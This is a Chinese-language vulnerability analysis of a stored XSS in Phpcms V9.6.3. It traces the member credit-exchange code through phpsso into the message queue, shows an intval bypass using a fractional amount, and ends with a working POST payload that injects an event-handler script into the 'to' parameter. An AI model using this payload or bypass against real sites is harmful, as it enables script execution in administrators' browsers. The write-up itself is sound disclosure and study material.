Phpcms_V9.6.3_储存型xss

# Phpcms V9.6.3 储存型xss

=======================

一、漏洞简介
————

二、漏洞影响
————

Phpcms V9.6.3

三、复现过程
————

### 漏洞分析

问题出在会员的积分兑换功能，文件：

/phpcms/modules/member/index.php
public function change_credit() {
$memberinfo = $this->memberinfo;
//加载用户模块配置
$member_setting = getcache(‘member_setting’);
$this->_init_phpsso();
$setting = $this->client->ps_getcreditlist();
$outcredit = unserialize($setting);
$setting = $this->client->ps_getapplist();
$applist = unserialize($setting);

if(isset($_POST[‘dosubmit’])) {
//本系统积分兑换数
$fromvalue = intval($_POST[‘fromvalue’]);
//本系统积分类型
$from = $_POST[‘from’];
$toappid_to = explode(‘_’, $_POST[‘to’]); //这个是问题的参数
//目标系统appid
$toappid = $toappid_to[0];
//目标系统积分类型
$to = $toappid_to[1];
if($from == 1) {
if($memberinfo[‘point’] < $fromvalue) { showmessage(L('need_more_point'), HTTP_REFERER); } } elseif($from == 2) { if($memberinfo['amount'] < $fromvalue) { showmessage(L('need_more_amount'), HTTP_REFERER); } } else { showmessage(L('credit_setting_error'), HTTP_REFERER); } $status = $this->client->ps_changecredit($memberinfo[‘phpssouid’], $from, $toappid, $to, $fromvalue);

这里有个问题，由于`if($memberinfo[‘point’] < $fromvalue)`所以，`$fromvalue`不能大于会员的点数，但是没充值的状态下，点数是为0的，但是又由于上面有`intval($fromvalue)`，所以我们可以`$fromvalue=0.9`经过`intval`后就成了`0`，也就绕过了上面的逻辑。跟进`ps_changecredit`函数： public function ps_changecredit($uid, $from, $toappid, $to, $credit) { return $this->_ps_send(‘changecredit’, array(‘uid’=>$uid, ‘from’=>$from, ‘toappid’=>$toappid, ‘to’=>$to, ‘credit’=>$credit));
}

继续跟进`_ps_send`函数：

private function _ps_send($action, $data = null) {
return $this->_ps_post($this->ps_api_url.”/index.php?m=phpsso&c=index&a=”.$action, 500000, $this->auth_data($data));
}

最后是经过`auth_data`函数处理和加密，`auth_data`调用`sys_auth`加密函数进行加密:

public function auth_data($data) {
$s = $sep = ”;
foreach($data as $k => $v) {
if(is_array($v)) {
$s2 = $sep2 = ”;
foreach($v as $k2 => $v2) {
$s2 .= “$sep2{$k}[$k2]=”.$this->_ps_stripslashes($v2);
$sep2 = ‘&’;
}
$s .= $sep.$s2;
} else {
$s .= “$sep$k=”.$this->_ps_stripslashes($v);
}
$sep = ‘&’;
}

$auth_s = ‘v=’.$this->ps_vsersion.’&appid=’.APPID.’&data=’.urlencode($this->sys_auth($s));
return $auth_s;
}

`_ps_post`函数主要就是让服务器访问自己的网站上的一个地址也就是访问了`phpsso`的`changecredit`函数（方法）。我们先来看看`phpsso`：

class phpsso {

public $db, $settings, $applist, $appid, $data;
/**
* 构造函数
*/
public function __construct() {
$this->db = pc_base::load_model(‘member_model’);
pc_base::load_app_func(‘global’);

/*获取系统配置*/
$this->settings = getcache(‘settings’, ‘admin’);
$this->applist = getcache(‘applist’, ‘admin’);

if(isset($_GET) && is_array($_GET) && count($_GET) > 0) {
foreach($_GET as $k=>$v) {
if(!in_array($k, array(‘m’,’c’,’a’))) {
$_POST[$k] = $v;
}
}
}

if(isset($_POST[‘appid’])) {
$this->appid = intval($_POST[‘appid’]);
} else {
exit(‘0’);
}

if(isset($_POST[‘data’])) {
parse_str(sys_auth($_POST[‘data’], ‘DECODE’, $this->applist[$this->appid][‘authkey’]), $this->data);

parse_str(sys_auth($_POST[‘data’], ‘DECODE’, $this->applist[$this->appid][‘authkey’]), $this->data);可以看到是通过sys_auth函数解密（加密跟解密的函数是一样的）。
最后来看看changecredit：
public function changecredit() {
$this->uid = isset($this->data[‘uid’]) ? $this->data[‘uid’] : exit(‘0’);
$this->toappid = isset($this->data[‘toappid’]) ? $this->data[‘toappid’] : exit(‘0’);
$this->from = isset($this->data[‘from’]) ? $this->data[‘from’] : exit(‘0’);
$this->to = isset($this->data[‘to’]) ? $this->data[‘to’] : exit(‘0’);
$this->credit = isset($this->data[‘credit’]) ? $this->data[‘credit’] : exit(‘0’);
$this->appname = $this->applist[$this->appid][‘name’];
$outcredit = $this->getcredit(1);
//目标系统积分增加数
$this->credit = floor($this->credit * $outcredit[$this->from.’_’.$this->to][‘torate’] / $outcredit[$this->from.’_’.$this->to][‘fromrate’]);

/*插入消息队列*/
$noticedata[‘appname’] = $this->appname;
$noticedata[‘uid’] = $this->uid;
$noticedata[‘toappid’] = $this->toappid;
$noticedata[‘totypeid’] = $this->to;
$noticedata[‘credit’] = $this->credit;
messagequeue::add(‘change_credit’, $noticedata);
exit(‘1’);
}

这里是进入数据库了：messagequeue::add(‘change_credit’, $noticedata);
public static function add($operation, $noticedata_send) {
$db = self::get_db();
$noticedata_send[‘action’] = $operation;
$noticedata_send_string = array2string($noticedata_send);

if ($noticeid = $db->insert(array(‘operation’=>$operation, ‘noticedata’=>$noticedata_send_string, ‘dateline’=>SYS_TIME), 1)) {
self::notice($operation, $noticedata_send, $noticeid);
return 1;
} else {
return 0;
}
}

调用insert写入数据。。这里就不跟了。由于系统开启了gpc（两次，初始化一次，phpsso一次），所以进去的数据是经过两次gpc的输出跟模板就不说了，反正没过滤直接出来

整理一下思路，先从积分兑换填写表单，然后将数据整理成数组经过`sys_auth`加密一次，然后服务器发送数据包给自己，收到数据包之后用`sys_auth`函数解密，然后调用`changecredit`方法，`inert`插入数据库，然后管理员在后台点击通信信息的时候触发xss!

### 漏洞复现

利用方法，先注册一个帐号，然后登录，然后访问:http://www.0-sec.org/index.php?m=member&c=index&a=change\_credit&post:

dosubmit=1&fromvalue=0.6&from=1id=1`setset’&to=}” onmousemove=alert(1)>//


参考链接
——–

> https://xz.aliyun.com/t/1860